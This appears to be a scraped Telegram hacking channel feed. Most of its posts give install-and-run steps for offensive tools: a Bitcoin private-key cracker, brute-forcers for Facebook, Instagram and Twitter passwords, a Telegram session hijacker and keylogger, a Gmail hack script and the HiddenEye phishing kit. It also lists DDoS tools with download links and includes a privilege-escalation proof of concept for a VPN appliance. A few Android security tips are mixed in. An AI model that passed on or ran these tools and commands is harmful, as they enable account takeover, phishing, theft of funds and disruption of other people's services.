UNDERCODE COMMUNITY
2.67K subscribers
1.23K photos
31 videos
2.65K files
79.7K links
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

Web & Services:
Undercode.help
Download Telegram
-----UNDERCODE-----

We saw many Scamers Put The UnderCode Company Picture or Descriptions...

🦑PLEASE NOTE IN ENGLISH VERSIONS:

> UNDERCODE COMPANY USE ONLY +961 Phones Numbers
And thx



@̷̡̯͖͚̘̫̫͒͐̍̐͂̓̽͛͘͝ ̵̦̦̤̺̺̣̠͐̓́̃̍̏M̴̛̫̪͓̠̞̰̤͚̫̃̚ŗ̸̖͐̓̽̋̓̆͛͆̉͝.̶̛͆̚͝ ̛̄ ̡͈̤̟͙̹ ̶̙͕̘̠̬̟͚̮͛̒́̈̏̓̈́͘͝B̶̧̧̫̺̈ö̷̧̙̘̤̭̟͉́T̷͌̃ ͎̲́́̎́̇͌Ņ̸̛̰̤̯̰̱͈͙̈̍̓̍̃͗ͅÉ̸ ̨͇͙͚T̶̓̽̒̈́̈́͋̃ ̧͚̫͇(̵̥̝͕͖̯̈́t̷̼̠̓̽͌.̵̆͝͠ ̖͎͕̮̼͙̓m̶̢̢̟͑̌̐͌͗̅͝.̶̢̗͎̈́͐͌͗͆͛͋̕͝)̵̝͔͍̠̺͎̪̔̄́̌͑͝ͅ


-------UNDERCODE------
-----U̷̅N̸͝D̴͝É̷R̸̉C̸̕O̸͆ ̤̞D̷͛Ȅ̵------

🦑
A tool for cracking Bitcoin private keys NEW 2019 Full GUIDE:

(instagram.com/UnderCodeTestingCompany)

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ 𝔸ℕ𝔻 ℝ𝕌ℕ:

1) git clone https://github.com/brichard19/BitCrack

🦑Build dependencies

1) Visual Studio 2019 (if on Windows)

2) For CUDA: CUDA Toolkit 10.1

3) For OpenCL: An OpenCL SDK (The CUDA toolkit contains an OpenCL SDK).

🦑Building in Windows:

1) Open the Visual Studio solution.

2) Build the clKeyFinder project for an OpenCL build.

3) Build the cuKeyFinder project for a CUDA build.

4) Note: By default the NVIDIA OpenCL headers are used. You can set the header and library path for OpenCL in the BitCrack.props property sheet.

🦑Building in Linux:

1) Using make:

2) Build CUDA:

3) make BUILD_CUDA=1

4) Build OpenCL:

5) make BUILD_OPENCL=1

>Or build both:

6) make BUILD_CUDA=1 BUILD_OPENCL=1

🦑ℍ𝕆𝕎 ℝ𝕌ℕ:

>Examples

1-The simplest usage, the keyspace will begin at 0, and the CUDA parameters will be chosen automatically

2-xxBitCrack.exe 1FshYsUh3mqgsG29XpZ23eLjWV8Ur3VwH

3-Multiple keys can be searched at once with minimal impact to performance. Provide the keys on the command line, or in a file with one address per line

4-xxBitCrack.exe 1FshYsUh3mqgsG29XpZ23eLjWV8Ur3VwH 15JhYXn6Mx3oF4Y7PcTAv2wVVAuCFFQNiP 19EEC52krRUK1RkUAEZmQdjTyHT7Gp1TYT

5-To start the search at a specific private key, use the --keyspace option:

6-xxBitCrack.exe --keyspace 766519C977831678F0000000000 1FshYsUh3mqgsG29XpZ23eLjWV8Ur3VwH

7-The --keyspace option can also be used to search a specific range:

8-xxBitCrack.exe --keyspace 80000000:ffffffff 1FshYsUh3mqgsG29XpZ23eLjWV8Ur3VwH

9-To periodically save progress, the --continue option can be used. This is useful for recovering after an unexpected interruption:

10-xxBitCrack.exe --keyspace 80000000:ffffffff 1FshYsUh3mqgsG29XpZ23eLjWV8Ur3VwH
...
11-GeForce GT 640 224/1024MB | 1 target 10.33 MKey/s (1,244,659,712 total) [00:01:58]
^C

12-xxBitCrack.exe --keyspace 80000000:ffffffff 1FshYsUh3mqgsG29XpZ23eLjWV8Ur3VwH
...
13- GeForce GT 640 224/1024MB | 1 target 10.33 MKey/s (1,357,905,920 total) [00:02:12]

14-Use the -b, -t and -p options to specify the number of blocks, threads per block, and keys per thread.

15- xxBitCrack.exe -b 32 -t 256 -p 16 1FshYsUh3mqgsG29XpZ23eLjWV8Ur3VwH

w͓̽r͓̽i͓̽t͓̽t͓̽e͓̽n͓̽ ͓̽b͓̽y͓̽ ͓̽M͓̽r͓̽.͓̽ ͓̽B͓̽o͓̽t͓̽N͓̽e͓̽t͓̽ ͓̽(͓̽t͓̽.͓̽m͓̽.͓̽)͓̽

- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -
This media is not supported in your browser
VIEW IN TELEGRAM
- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - -

🦑Another Script for bitcoin users for Generate Bitcoin Private Keys and check them against blockexplorer.com
(t.me/UnderCodeTestingOfficial)

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ 𝔸ℕ𝔻 ℝ𝕌ℕ:

1) Clone this script - download it or in the terminal use git clone https://github.com/Frankenmint/PKGenerator_Checker/

2) Let's install some dependencies! pip install ecdsa hashlib base58 requests cfscrape

3) Navigate to the directory: cd PKGenerator_Checker

🦑Run it!

4) python PkMaker.py

🦑FEATURES:

1) A random 32 byte Number is generated and encoded into Hex - Basially a number between 1 and 2^256 OR if counting in decimal form: 115792089237316195423570985008687907853269984665640564039457584007913129639936. Then, that key is hashed a few times into a public address according to these standard rules and is fired off to blockexplorer.com using their API. The script then prints the balance to the console window.

2) use cfscraper to get around the issue of cloudflare on the v2 version of the script which uses bitcoinlist.io this version will scan an entire page at a time of keys..though idk if the underlying site is to be trusted (ie they just tell you the funds are zero and sweep the funds into their own wallet first)

3) ENJOY😁

w͓̽r͓̽i͓̽t͓̽t͓̽e͓̽n͓̽ ͓̽b͓̽y͓̽ ͓̽M͓̽r͓̽.͓̽ ͓̽B͓̽o͓̽t͓̽N͓̽e͓̽t͓̽ ͓̽(͓̽t͓̽.͓̽m͓̽.͓̽)͓̽

- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -
- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -

🦑HACK TWITTER/Instagram 2018 via Simple script :
(Facebook.com/UnderCodeTestingCompanie)

🦑INSTALLISATION & RUN:

1) Open terminal and type

> git clone https://github.com/Juniorn1003/Faitagram/

2) cd Faitagram

3) python setup.py

🦑🅃🄾 🅁🅄🄽 :


>
Commands:


1) python faitagram -s [service] -u [username] -w [wordlist] -d [delay(Optional)]

2) We recommended to get any WorldList From wireshark official sites of from recently UnderCode Tutorials

🦑🄴🅇🄰🄼🄿🄻🄴🅂:


1) python faitagram -s facebook -u MeMeBigBoy@gmail.com -w /root/passwd.txt -d 10

(Execute faitagram) (facebook) (Email of the target) (wordlist path) (delay[10secs])


2) python faitagram -s instagram -u justin -w wlist

(Execute faitagram) (Instagram) (username) (wordlist)


3) python faitagram -s twitter -u hellohahahha -w wlist -d 3

(Execute faitagram) (Twitter) (Username) (wordlist) (delay[3secs])

🦑Pay Attention:



1) -s, -u, -w parameters are musts, and -d is optional.

-d in default is 1 sec.

2) In facebook, you would have to type the email in the -u.

3) In facebook, the script will ask you the Name of the target.


@̷̨̙̩͍̦̹̈ͅ ̵̯͙̭͔͊̄̈́̕͜͝ M̵̺̮͓̖͐̈́̓r̶̹̯̜͗͜.̷̡̺͇̄̍͒̀́̀͌̈́̄ ̸̠̐̌́̚͝B̵̧͈̓̇̈́̃͂͛́̑̄ơ̸̦̤̪͈͇̝̻͒͗̈͂͂ţ̴̥̖̬̟̲̥̯͖̑̔̒̉̀̓́̃̚̚N̸̠̼̭͚̮̜̻̤͘ȩ̸̧͈̭͉̱͊͋̏̏ͅṭ̷̖͎̤̖͙͑ͅ ̸̣̗̫͕̻̘̻͔̤̋ͅ(̴ ̺̖̥͔̞̪̬͎̘͚̅̈́̾̓ṯ̶̡͉̺̬̍̎̕.̷̨̡̛̐͋͊̑̉̒̅̍͝m̷̑̋͝ ̹̦̲̯̓̃̆)̵̨̧̛̞͈̟͖̞̰͇̟̈́͌̂̔͘


- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -
- - - - - U̷̅N̸͝D̴͝É̷R̸̉C̸̕O̸͆ ̤̞D̷͛Ȅ̵ - - - - -

🦑HACK TELEGRAM Updated TOPIC 2019 by UnderCode:
( t.me/UnderCodeTestingOfficial)

🦑Ⓘⓝⓢⓣⓐⓛⓛⓘⓢⓐⓣⓘⓞⓝ & Ⓡⓤⓝ :

(Windows/Linux/Termux)

1) git clone https://github.com/ultrasecurity/TeleKiller.git

2) cd TeleKiller

3) pip install -r requirements.txt

4) python TeleKiller.py

🦑Ⓕⓔⓐⓣⓤⓡⓔⓢ :

1) Session Hijacking

2) Stealer Local Passcode

3) Keylogger

4) Shell

5) Bypass 2 Step Verification

6) Bypass Av (Coming Soon)

🦑Ⓓⓔⓟⓔⓝⓓⓔⓝⓒⓨ:

1) python 2.7

>pkg install python

2) pyHook

3) pywin32
> For Windows Users

🦑Tested On :

1) Windows 10

2) Windows 8.1

3) Windows 8

4) Windows 7

@̷̈ ̵͊ M̵͐r̶͗.̷̄ ̸̐B̵̓o̸͒t̴̚N̸͘e̸͊t̷͑ ̸̋(̴ ̅̈́t̶̕.̷̐m̷̑ ̓̃)̵͘

- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -
- - - - - U̷̅N̸͝D̴͝É̷R̸̉C̸̕O̸͆ ̤̞D̷͛Ȅ̵ - - - - -

🦑How to Make Android as Secure as Possible By UndercOde:
(instagram.com/UnderCodeTestingCompany)

🦑Le̲t̲s̲ ̲S̲t̲a̲r̲t̲:̲

1) Enable Two-Factor Authentication On Your Google Account

> A secure Android phone starts with a secure Google account, because that’s where all your synced data is stored—and the more Google services you use, the more crucial this step is.

> If you haven’t already, start by enabling two-factor authentication (2FA) on your Google account. There are several options for that second factor, be it a simple text message (which is inherently the least secure of all 2FA methods, but still better than nothing) to adding a U2F key like Google’s Titan Key bundle.

> You can find Google’s 2FA settings in My Account

> 2-Step Verification

2) Use a Secure Lock Screen

3) Make Sure Find My Phone is On

> Losing your phone is a gut-wrenching feeling, so you also want to make sure you have a way to track it and, worse case scenario, remotely reset your phone if there’s no chance of getting it back.

> Fortunately, Google has a tracking system in place for Android phones. It’s called Find My Phone, and it should be enabled by default on all modern Android phones. To double check, jump into Settings > Google > Security > Find My Phone.

4) Consider using apps that provide end-to-end encryption:

> This is entirely optional, as Android already has Gmail pre-installed (and emails might be the most sensitive information you transmit on your phone, outside of financial transactions). If you’re twitchy about your privacy when sending SMS messages, you may opt to use a third-party app to encrypt them. Apps such as Signal, Dust, Telegram, and WhatsApp (among others) could just be what you’re looking for.

5 ) Turn off Bluetooth and WiFi when you’re not using them:

> Doing so not only decreases the likelihood of mobile attacks (not to mention pranks) taking advantage of Bluetooth technology and WiFi, but it also helps with your smartphone’s battery life.

6) Be wary of (unofficial) apps that bank on other apps’ popularity, or on seasons and events:

> We’ve seen apps appear in the Play Store pretending to be something related to [famous app here], but cheaper, with more features, or some other too-good-to-be-true scenario. For example, WhatsApp is no stranger to copycat apps. In late November 2017,

> one supposed WhatsApp update used Unicode to slip under Google’s defenses. We’ve also seen fake apps that take advantage of popular events, like the Winter Olympics.

7) Weigh the odds when it comes to free public WiFi:

> Ah, coffee shop WiFi—to connect or not connect? Well, it depends. Is the WiFi you want to connect to even legitimate? Approach a coffee shop employee and ask for the WiFi’s name and password.

> If there’s a password, it’s a bit safer to connect. (If not, consider any browsing you do in the coffee shop to be open season for criminals.)


🦑 Things Google Already Does to Make Sure Your Phone is Secure:

1 ) Google Play Protect
Starting with Android 8.0 (Oreo), Google baked in a feature named Play Protect.

2 ) On-Device Encryption:

> In the earliest days of Android, encryption wasn’t even an option. Google added it later, though you had to enable it manually, and that was a hassle. These days, Android is encrypted by default on all modern devices, and you can’t turn it off.

Written By Mr. BotNet (t.m.)
- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -
- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -

🦑NETWORKING TRICKS:
(t.me/UnderCodeTestingOfficial)

🦑🄻🄴🅃 🅂 🅂🅃🄰🅁🅃:

RDPY is an RDP Security Tool in Twisted Python with RDP Man in the Middle proxy support which can record sessions and Honeypot functionality.

> RDPY is a pure Python implementation of the Microsoft RDP (Remote Desktop Protocol) protocol (client and server side). RDPY is built over the event driven network engine Twisted. RDPY support standard RDP security layer, RDP over SSL and NLA authentication (through ntlmv2 authentication protocol).

🦑Ⓘⓝⓢⓣⓐⓛⓛⓘⓢⓐⓣⓘⓞⓝ & Ⓡⓤⓝ:

1) dOWNLOAD https://github.com/citronneur/rdpy/archive/v1.3.2.zip

2) unzip

3) RDPY Hacking RDP Binaries

open terminal and type fter going to dir

4) rdpy-rdpclient.py [-u username] [-p password] [-d domain] [-r rss_ouput_file] [...] XXX.XXX.XXX.XXX[:3389]
1

5) rdpy-rdpclient.py [-u username] [-p password] [-d domain] [-r rss_ouput_file] [...] XXX.XXX.XXX.XXX[:3389]

6) You can use rdpy-rdpclient in a Recorder Session Scenario, used in rdpy-rdphoneypot.
rdpy-vncclient

> rdpy-vncclient is a simple VNC Qt4 client.

7) rdpy-vncclient.py [-p password] XXX.XXX.XXX.XXX[:5900]


8) rdpy-vncclient.py [-p password] XXX.XXX.XXX.XXX[:5900]

rdpy-rdpscreenshot

rdpy-rdpscreenshot saves login screen in file.
9) rdpy-rdpscreenshot.py [-w width] [-l height] [-o output_file_path] XXX.XXX.XXX.XXX[:3389]


10) rdpy-rdpscreenshot.py [-w width] [-l height] [-o output_file_path] XXX.XXX.XXX.XXX[:3389]

rdpy-vncscreenshot

rdpy-vncscreenshot saves the first screen update in file.

11) rdpy-vncscreenshot.py [-p password] [-o output_file_path] XXX.XXX.XXX.XXX[:5900]


12) rdpy-vncscreenshot.py [-p password] [-o output_file_path] XXX.XXX.XXX.XXX[:5900]

rdpy-rdphoneypot

rdpy-rdphoneypot is an RDP honey Pot. Use Recorded Session Scenario to replay scenario through RDP Protocol.

13) rdpy-rdphoneypot.py [-l listen_port] [-k private_key_file_path] [-c certificate_file_path] rss_file_path_1 ... rss_file_path_N

14) rdpy-rdphoneypot.py [-l listen_port] [-k private_key_file_path] [-c certificate_file_path] rss_file_path_1 ... rss_file_path_N

The private key file and the certificate file are classic cryptographic files for SSL connections. The RDP protocol can negotiate its own security layer. If one of both parameters are omitted, the server use standard RDP as security layer. You can specify more than one files to match more common screen size.

🦑 now rdpy-rssplayer:

> rdpy-rssplayer is use to replay Record Session Scenario (rss) files generates by either rdpy-rdpmitm or rdpy-rdpclient binaries.

15) rdpy-rssplayer.py rss_file_path


16 ) rdpy-rssplayer.py rss_file_path

Written by ̵͊ M̵͐r̶͗.̷̄ ̸̐B̵̓o̸͒t̴̚N̸͘e̸͊t̷͑ ̸̋(̴ ̅̈́t̶̕.̷̐m̷̑ ̓̃)̵͘

- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -
- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -

🦑How To Add Firewall In Any Android:

> The method is quite simple and straight and you just need a cool Android app that will allow you to add the Firewall feature that will help you to ensure the security of your Android device
(instagram.com/UnderCodeTestingCompany)

🦑🄻🄴🅃🅂 🅂🅃🄰🅁🅃:

1) First of all, you need to download and install the cool android app that is NoRoot Firewall the app that will allow you to add firewall feature to your device.
> https://play.google.com/store/apps/details?id=app.greyshirts.firewall

2) Now you need to launch the app after installing it in your device. Now you need to click on “Start”

3) Now you need to allow the connection, simply tap on “OK” to continue

4) Now you need to move over the “Pending Access” tab and there you will see all the apps that require connecting to the internet. Simply allow them or deny them as per your wish

5) That’s it! you are done, now your Android has a Firewall that will be securing your device from various threats.

🦑Methode 2:

> Using Mobiwol:

Mobiwol NoRoot Firewall can be used to save battery, reduce data usage so you stay within your data plan, and secure your privacy by limiting the network access permissions required by apps.
> https://play.google.com/store/apps/details?id=com.netspark.firewall

1) First of all, you need to download and install Mobiwol on your Android device. Once installed, launch the app.

2) Now you will see the screen like below. Wait for few second until the app loads.

3) Now you need to turn on the Firewall Status.

4) Now it will ask you to grant the permission to set up a VPN connection that will allow the app to monitor the network traffic. Simply tap on “Ok” to continue.

5) Now in the next step, you need to tap on the Firewall Rules. There you will see all the apps that require connecting to the internet. Simply allow them or deny them as per your wish.

6) You can even set Firewall settings according to your wish.

7) So, this is how you can use Mobiwol to add a firewall to your Android device.

🦑SIMILARS:

1)#1DroidWall – Android Firewall
>https://play.google.com/store/apps/details?id=com.googlecode.droidwall.free&hl=de&gl=de

2) #2 NetGuard – no-root firewall
>https://play.google.com/store/apps/details?id=eu.faircode.netguard

3) #3 Firewall Gold
>https://play.google.com/store/apps/details?id=com.anstudios.androidfirewall&hl=de&gl=de

@̷̈ ̵͊ M̵͐r̶͗.̷̄ ̸̐B̵̓o̸͒t̴̚N̸͘e̸͊t̷͑ ̸̋(̴ ̅̈́t̶̕.̷̐m̷̑ ̓̃)̵͘

- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -
- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - -

🦑Best DDos Tools 2019
(t.me/UnderCodeTestingOfficial)

🦑1) LOIC (Low Orbit Ion Canon)

> LOIC is one of the most popular DOS attacking tools freely available on the Internet. This tool was used by the popular hackers group Anonymous against many big companies’ networks last year. Anonymous has not only used the tool, but also requested Internet users to join their DDOS attack via IRC.

>https://sourceforge.net/projects/loic/

2) XOIC

> XOIC is another nice DOS attacking tool. It performs a DOS attack an any server with an IP address, a user-selected port, and a user-selected protocol. Developers of XOIC claim that XOIC is more powerful than LOIC in many ways


>http://anonhacktivism.blogspot.com/2017/11/new-xoic-ddos-tool-download.html

3) HULK (HTTP Unbearable Load King)

> HULK is another nice DOS attacking tool that generates a unique request for each and every generated request to obfuscated traffic at a web server. This tool uses many other techniques to avoid attack detection via known patterns.

> http://packetstormsecurity.com/files/112856/HULK-Http-Unbearable-Load-King.html

4) DDOSIM—Layer 7 DDOS Simulator
DDOSIM is another popular DOS attacking tool. As the name suggests, it is used to perform DDOS attacks by simulating several zombie hosts. All zombie hosts create full TCP connections to the target server.

> This tool is written in C++ and runs on Linux systems.

>These are main features of DDOSIM

🦑Features:
Simulates several zombies in attack
Random IP addresses
TCP-connection-based attacks
Application-layer DDOS attacks
HTTP DDoS with valid requests
HTTP DDoS with invalid requests (similar to a DC++ attack)
SMTP DDoS
TCP connection flood on random port
Download DDOSIM here: http://sourceforge.net/projects/ddosim/

> Read more about this tool here: http://stormsecurity.wordpress.com/2009/03/03/application-layer-ddos-simulator/

5) R-U-Dead-Yet:

> R-U-Dead-Yet is a HTTP post DOS attack tool. For short, it is also known as RUDY. It performs a DOS attack with a long form field submission via the POST method. This tool comes with an interactive console menu. It detects forms on a given URL and lets users select which forms and fields should be used for a POST-based DOS attack.

> Download RUDY: https://code.google.com/p/r-u-dead-yet/

6) Tor’s Hammer

> Tor’s Hammer is another nice DOS testing tool. It is a slow post tool written in Python. This tool has an extra advantage: It can be run through a TOR network to be anonymous while performing the attack. It is an effective tool that can kill Apache or IIS servers in few seconds.

> Download TOR’s Hammer here: http://packetstormsecurity.com/files/98831/

7) PyLoris:

> PyLoris is said to be a testing tool for servers. It can be used to perform DOS attacks on a service. This tool can utilize SOCKS proxies and SSL connections to perform a DOS attack on a server. It can target various protocols, including HTTP, FTP, SMTP, IMAP, and Telnet. The latest version of the tool comes with a simple and easy-to-use GUI. Unlike other traditional DOS attacking tools, this tool directly hits the service.

> Download PyLoris: http://sourceforge.net/projects/pyloris/

8) OWASP DOS HTTP POST
It is another nice tool to perform DOS attacks. You can use this tool to check whether your web server is able to defend DOS attack or not. Not only for defense, it can also be used to perform DOS attacks against a website.

> Download here: https://code.google.com/p/owasp-dos-http-post/

9) DAVOSET
>DAVOSET is yet another nice tool for performing DDOS attacks. The latest version of the tool has added support for cookies along with many other features. You can download DAVOSET for free from Packetstormsecurity.

> Download DavoSET: http://packetstormsecurity.com/files/123084/DAVOSET-1.1.3.html

10) GoldenEye HTTP Denial Of Service Tool
GoldenEye is also a simple but effective DOS attacking tool.
It was developed in Python for testing DOS attacks, but people also use it as hacking tool.
> Download GoldenEye: http://packetstormsecurity.com/files/120966/GoldenEye-HTTP-Denial-Of-Service-Tool.html

Written By Mr. BotNet (t.m.)
- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - -
- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - -

🦑iOS Apps Wireless Installation guide 2019 Lastest update:
(t.me/UnderCodeTestingOfficial)

🦑🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽:

1) git clone https://github.com/vineetchoudhary/AppBox-iOSAppsWirelessInstallation

2) You can install AppBox by running following command in your terminal -

> curl -s https://getappbox.com/install.sh | bash

🦑Manual install:

If you face any issue using above command then you can manually install AppBox by downloading it from here

>http://tryappbox.com/download
After that, unzip AppBox.app.zip and move AppBox.app into /Applications directory.

3) Link your Dropbox account with AppBox.

4) Select and upload the iOS application "OR" select project/workspace to archive and upload the iOS application.

5) Send the link to your testers, clients, friends or even use it yourself.

6) Open the link in the browser on the device and click on install.

🦑FEATURES:

> Auto App Signing

>rocket Auto Upload on Dropbox or AppStore after Archive

>link Keep same installation link for the same app

> paperclips Install previous version with same installation link

>email Auto E-Mail App Distribution Link
electric_plug Auto Shutdown Mac after Distribution

>package Maximum Upload Size - Equal to your Dropbox account storage

>date Uploaded App Expiration - Until you delete from your Dropbox
sparkles Unlimited app installations

>fire Auto Restart Upload After Network Change or Failure
tophat Easy setup assistant to get started in a few minutes

>wrench Slack, Microsoft Teams and Hangout Chat Webhook Integration

>kissing_heart Dashboard

>rocket Fastlane support read more

>ship Jenkins Support read more

>dark_sunglasses Dark Theme

Written By Mr. BotNet (t.m.)
- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -
- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -

🦑Gmail Hack by Hak9
(facebook.com/UnderCodeTestingCompanie)

🦑🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽:

1) git clone https://github.com/xHak9x/gmailhack.git

2) cd gmailhack

3) python gmailhack.py

🦑A linux operating system. We recommend :

1) Kali Linux

2) Cyborg

3) Parrot

4) BackTrack

5) Backbox

@ 🄼🅁. 🄱🄾🅃🄽🄴🅃 (🅃.🄼)
- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -
- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -

🦑-RED IBM Cloud Starter Application 2019 lastest update:
(t.me/UndercodeTestingOfficial)

🦑Node-RED application that can be deployed into IBM Cloud with only a couple clicks. Try it out for yourself right now by clicking

🦑How does this work?

> When you click the button, you are taken to IBM Cloud where you get a pick a name for your application at which point the platform takes over, grabs the code from this repository and gets it deployed.

>It will automatically create an instance of the Cloudant service and bind it to your app. This is where your Node-RED instance will store its data.

>When you first access the application, you'll be asked to set some security options to ensure your flow editor remains secure from unauthorised access.

>It includes a set of default flows that are automatically deployed the first time Node-RED runs.

🦑🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽:

1) git clone https://github.com/ibmets/node-red-bluemix-starter

2) he default flows are stored in the defaults directory in the file called flow.json

> cd node-red-bluemix-starter
> run vi node comm

3) When the application is first started, this flow is copied to the attached Cloudant instance. When a change is deployed from the editor, the version in cloudant will be updated - not this file.

4) The web content you get when you go to the application's URL is stored under the public directory.

5) If you want to change the name of the Cloudant instance that gets created, the memory allocated to the application or other deploy-time options, have a look in manifest.yml.


Written By Mr. BotNet (t.m.)
- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -
- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -

🦑The Famous Script hidden eye have new release :
PHISHING | KEYLOGGER | INFORMATION_COLLECTOR | ALL_IN_ONE_TOOL | SOCIALENGINEERING
(instagram.com/UnderCodeTestingCompany)

🦑🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽:

WORK tERMUX(root)/Kali

🦑BlackArch official repository

1) sudo pacman -S hidden-eye
to run just use

2) sudo hidden-eye

CLONE
git clone https://github.com/DarkSecDevelopers/HiddenEye.git

3) chmod 777 HiddenEye

4) sudo apt install python3-pip

5) cd HiddenEye

6) sudo pip3 install -r requirements.txt

7) python3 HiddenEye.py

OR

./HiddenEye.py

🦑RUNNING (Arch Linux or Manjaro)

1) After cloning

2) chmod 777 HiddenEye

3) sudo pacman -Syu

4) sudo pacman -S python-pip

5) cd HiddenEye

6) sudo pip3 install -r requirements.txt

7) sudo python3 HiddenEye.py

OR

sudo ./HiddenEye.py

🦑FOR ANDROID USERS:

1) INSTALLING IN (USERLAND APP)
>Install userland app from playstore.

2) Set up app and install kali from app.Set ssh username(anyname) and password.

3) When kali will run it'll ask for password type the ssh password.Then do su.

4) After that kali will run on your device wothout root and do apt update

5) apt install python3 python3-pip unzip php git

6) git clone https://github.com/DarkSecDevelopers/HiddenEye.git

7) chmod 777 HiddenEye

8) cd HiddenEye

9) pip3 install -r requirements.txt

10) python3 HiddenEye.py

🦑 INSTALLING IN (TERMUX APP)

1) First install { Termux } from Playstore.

2) pkg install git python php curl openssh grep

3) pip3 install wget

4) git clone -b Termux-Support-Branch https://github.com/DarkSecDevelopers/HiddenEye.git

5) chmod 777 HiddenEye

6) cd HiddenEye

7) python HiddenEye.py

or

./HiddenEye.py

🦑ONE LINE COMMAND TO INSTALL IN TERMUX(ANDROID). Just copy/paste this single command and hit Enter .. ALL DONE

1) First install { Termux } from Playstore.

2) After opening Copy and run this Single Command.

3) pkg install git python php curl openssh grep && pip3 install wget && git clone -b Termux-Support-Branch https://github.com/DarkSecDevelopers/HiddenEye.git && chmod 777 HiddenEye && cd HiddenEye && python HiddenEye.py

w͓̽r͓̽i͓̽t͓̽t͓̽e͓̽n͓̽ ͓̽b͓̽y͓̽ ͓̽M͓̽r͓̽.͓̽ ͓̽B͓̽o͓̽t͓̽N͓̽e͓̽t͓̽ ͓̽(͓̽t͓̽.͓̽m͓̽.͓̽)͓̽

- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -
- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -

🦑CVE : CVE-2018-2019
DarkNet Trick:
(t.me/UnderCodeTestingOfficial):
# Category: webapps

1) Description:

> Certain Secure Access SA Series SSL VPN products (originally developed by

> Juniper Networks but now sold and supported by Pulse Secure, LLC) allow
privilege escalation, as demonstrated by Secure Access SSL VPN SA-4000
5.1R5 (build 9627) 4.2 Release (build 7631). This occurs because
appropriate controls are not performed.


2) How Do Lattack?
Proof of Concept

> It is possible to change the administrator user password from readonly user

> because the appropriate controls are not performed. Save the page
/dana-admin/user/update.cgi in local, change the "user" value and save
changes.


3) Solution:

This version is deprecated. Keep Updating to latest version of this product.

@̶̍ ̸̛ ̝̹M̶̆ṙ̵.̶̍ ͛͐ ̴́B̵̅ ̹o̵͒t̷ ̛͑n̶̐ ̝͓e̴͑t̴̎ ̠͌(̵͒t̴ ͒̽.̸̈́m̶̒ ͖̑.̷̑
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁